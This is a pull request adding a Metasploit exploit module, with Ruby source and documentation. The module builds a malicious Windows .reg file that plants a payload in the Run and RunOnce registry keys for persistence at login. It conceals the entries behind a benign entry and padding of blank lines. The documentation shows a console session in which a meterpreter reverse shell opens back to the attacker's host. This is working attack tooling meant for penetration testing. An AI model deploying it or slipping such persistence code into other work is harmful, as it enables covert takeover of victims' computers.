### PR TITLE
Add Malicious Windows Registration Entries (.reg) File module

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/windows_registration_entries.md
+++ b/documentation/modules/exploit/windows/fileformat/windows_registration_entries.md
@@ -1,0 +1,114 @@
+## Vulnerable Application
+
+This module creates a Windows Registration Entries (.reg) file which
+adds the specified payload to the Windows Registry. The payload runs
+upon Windows login for the current user. If the user has elevated
+privileges when opening the file, the payload will run upon login
+when any user logs in.
+
+The user will receive a warning prompt to confirm Registry changes
+when opening the file.
+
+This module has been tested successfully on:
+
+* Microsoft Windows 7 Professional SP1 (x86_64)
+* Microsoft Windows 11 Professional 21H2 (x86_64)
+
+
+## Options
+
+### FILENAME
+
+The registration entries file name. (Default: `msf.reg`).
+
+
+## Advanced Options
+
+### AddToCurrentUserWindowsCurrentVersionRun
+
+Add payload to login for current user. (Default: `true`)
+
+### AddToCurrentUserWindowsCurrentVersionRunOnce
+
+Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use. (Default: `false`)
+
+### AddToLocalMachineWindowsCurrentVersionRun
+
+Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions,
+but all other entries are still added successfully. (Default: `true`)
+
+### AddToLocalMachineWindowsCurrentVersionRunOnce
+
+Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.' (Default: `false`)
+
+### PrependBenignEntry
+
+Prepend a benign registry entry at the start of the file. (Default: `true`),
+
+### PrependNewLines
+
+Prepend new lines before the first malicious registry entry. (Default: `100`)
+
+
+## Verification Steps
+
+On the Metasploit host:
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/windows_registration_entries`
+1. Do: `set filename [filename.reg]`
+1. Do: `set payload [payload]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `run`
+1. Do: `handler -p [payload] -P [lport] -H [lhost]`
+
+On the target Windows machine:
+
+1. Ensure Windows Security is disabled
+1. Open the `msf.reg` file and click `Yes` for the "Are you sure you want to continue?" prompt
+1. Log out then login as the same user
+
+
+## Scenarios
+
+### Microsoft Windows 11 Professional 21H2 (x86_64)
+
+```
+msf6 > use exploit/windows/fileformat/windows_registration_entries
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/fileformat/windows_registration_entries) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/fileformat/windows_registration_entries) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/fileformat/windows_registration_entries) > set lport 4444
+lport => 4444
+msf6 exploit(windows/fileformat/windows_registration_entries) > run
+[+] msf.reg stored at /root/.msf4/local/msf.reg
+[*] This file will create the following registry keys:
+HKEY_CURRENT_USER\Software\JpWpgNXlLXXrQv\Kz8Qi33Zow
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\2iL9aN40YYLwgDl
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rhFG8l9yvhQ
+msf6 exploit(windows/fileformat/windows_registration_entries) > handler -p cmd/windows/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+msf6 exploit(windows/fileformat/windows_registration_entries) > 
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+
+msf6 exploit(windows/fileformat/windows_registration_entries) > 
+[*] Sending stage (203846 bytes) to 192.168.200.169
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.169:59250) at 2025-07-13 08:42:07 -0400
+
+msf6 exploit(windows/fileformat/windows_registration_entries) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: win-11-pro-x64\asdf
+meterpreter > sysinfo 
+Computer        : WIN-11-PRO-X64
+OS              : Windows 11 21H2 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 5
+Meterpreter     : x64/windows
+```

--- a/modules/exploits/windows/fileformat/windows_registration_entries.rb
+++ b/modules/exploits/windows/fileformat/windows_registration_entries.rb
@@ -1,0 +1,203 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious Windows Registration Entries (.reg) File',
+        'Description' => %q{
+          This module creates a Windows Registration Entries (.reg) file which
+          adds the specified payload to the Windows Registry. The payload runs
+          upon Windows login for the current user. If the user has elevated
+          privileges when opening the file, the payload will run upon login
+          when any user logs in.
+
+          The user will receive a warning prompt to confirm Registry changes
+          when opening the file.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bcoles'
+        ],
+        'References' => [
+          ['URL', 'https://support.microsoft.com/en-us/topic/how-to-add-modify-or-delete-registry-subkeys-and-values-by-using-a-reg-file-9c7f37cf-a5e9-e1cd-c4fa-2a26218a1a23'],
+          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys'],
+          ['URL', 'https://learn.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key'],
+          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
+        ],
+        'Arch' => [ARCH_CMD],
+        'Platform' => 'win',
+        'Payload' => {
+          'Space' => 244, # 255 minus "cmd.exe /c " prefix length
+          'BadChars' => "\x00",
+          'DisableNops' => true
+        },
+        'Targets' => [
+          [
+            'Microsoft Windows 2000 or newer',
+            {
+              'RegistryEditorVersion' => '5.00'
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '1995-08-24',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The registration entries file name.', 'msf.reg']),
+      ]
+    )
+
+    register_advanced_options([
+      OptBool.new('AddToCurrentUserWindowsCurrentVersionRun', [false, 'Add payload to login for current user.', true]),
+      OptBool.new('AddToCurrentUserWindowsCurrentVersionRunOnce', [false, 'Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
+      OptBool.new('AddToLocalMachineWindowsCurrentVersionRun', [false, 'Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions, but all other entries are still added successfully.', true]),
+      OptBool.new('AddToLocalMachineWindowsCurrentVersionRunOnce', [false, 'Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
+      OptBool.new('PrependBenignEntry', [false, 'Prepend a benign registry entry at the start of the file.', true]),
+      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the first malicious registry entry.', 100]),
+    ])
+  end
+
+  # Create a registry entry in Windows .reg file format
+  def registry_entry(path, type, key, value)
+    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-element-size-limits
+    raise "Registry key '#{type}' length (#{key.length}) is too long (max 255)" if key.length > 255
+    raise "Registry value '#{value}' length (#{value.length}) is too long (max 16,300)" if value.length > 16_300
+
+    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types
+    raise "Unsupported key type '#{type}', excepted REG_SZ" unless type == 'REG_SZ'
+
+    escaped_value = value.gsub('\\', '\\\\\\').gsub('"', '\\\"')
+    reg_entry = "[#{path}]\r\n"
+    reg_entry << "\"#{key}\"=\"#{escaped_value}\"\r\n"
+    vprint_status("Created registry entry:\n#{reg_entry}")
+    reg_entry
+  end
+
+  # Format commands for use with the appropriate interpreter
+  def format_commands(command_string)
+    # Strip preceding whitespace as this would prevent execution
+    raw_cmd = command_string.to_s.gsub(/^\s*/, '')
+
+    # If the payload contains " & " we presume it is a command string.
+    #
+    # TODO: Change this once Metasploit is able to inform a module that
+    #       the specified ARCH_CMD payload is a string of commands
+    #       (not a single command).
+    if raw_cmd.include?(' & ')
+      cmd = "cmd.exe /c #{raw_cmd}"
+    else
+      cmd = raw_cmd
+    end
+
+    raise "Command length (#{cmd.length}) is too long (max 255)" if cmd.length > 255
+
+    cmd
+  end
+
+  def exploit
+    # File structure:
+    #   File header string
+    #   Benign registry entry (optional)
+    #   Visual whitespace padding (optional)
+    #   HKCU entries
+    #   HKLM entries (optional)
+    reg = "Windows Registry Editor Version #{target['RegistryEditorVersion']}\r\n"
+    reg << "\r\n"
+
+    reg_entries = []
+
+    if datastore['PrependBenignEntry']
+      path = "HKEY_CURRENT_USER\\Software\\#{rand_text_alphanumeric(10..16)}"
+      key = rand_text_alphanumeric(10..16)
+      reg << registry_entry(
+        path,
+        'REG_SZ',
+        key,
+        rand_text_alphanumeric(10..16)
+      )
+      reg_entries << path + '\\' + key
+    end
+
+    reg << "\r\n" * datastore['PrependNewLines']
+
+    if datastore['AddToCurrentUserWindowsCurrentVersionRun']
+      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
+      key = rand_text_alphanumeric(10..16)
+      reg << registry_entry(
+        path,
+        'REG_SZ',
+        key,
+        format_commands(payload.encoded)
+      )
+      reg_entries << path + '\\' + key
+    end
+
+    if datastore['AddToCurrentUserWindowsCurrentVersionRunOnce']
+      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
+      key = rand_text_alphanumeric(10..16)
+      reg << registry_entry(
+        path,
+        'REG_SZ',
+        key,
+        format_commands(payload.encoded)
+      )
+      reg_entries << path + '\\' + key
+    end
+
+    if datastore['AddToLocalMachineWindowsCurrentVersionRun']
+      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
+      key = rand_text_alphanumeric(10..16)
+      reg << registry_entry(
+        path,
+        'REG_SZ',
+        key,
+        format_commands(payload.encoded)
+      )
+      reg_entries << path + '\\' + key
+    end
+
+    if datastore['AddToLocalMachineWindowsCurrentVersionRunOnce']
+      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
+      key = rand_text_alphanumeric(10..16)
+      reg << registry_entry(
+        path,
+        'REG_SZ',
+        key,
+        format_commands(payload.encoded)
+      )
+      reg_entries << path + '\\' + key
+    end
+
+    unless reg_entries
+      fail_with(Failure::BadConfig, 'No registry entries were created! Check module advanced options.')
+    end
+
+    file_create(reg)
+
+    print_status("This file will create the following registry keys:\n#{reg_entries.join("\n")}")
+  rescue StandardError => e
+    print_error(e.message)
+  end
+end


### PR DESCRIPTION
This is unlikely to allow initial access without substantial social engineering efforts, as uncompressed `.reg` files are blocked by Outlook and `Run[Once]` keys are monitored, but a shell is a shell and it's not stupid if it works.
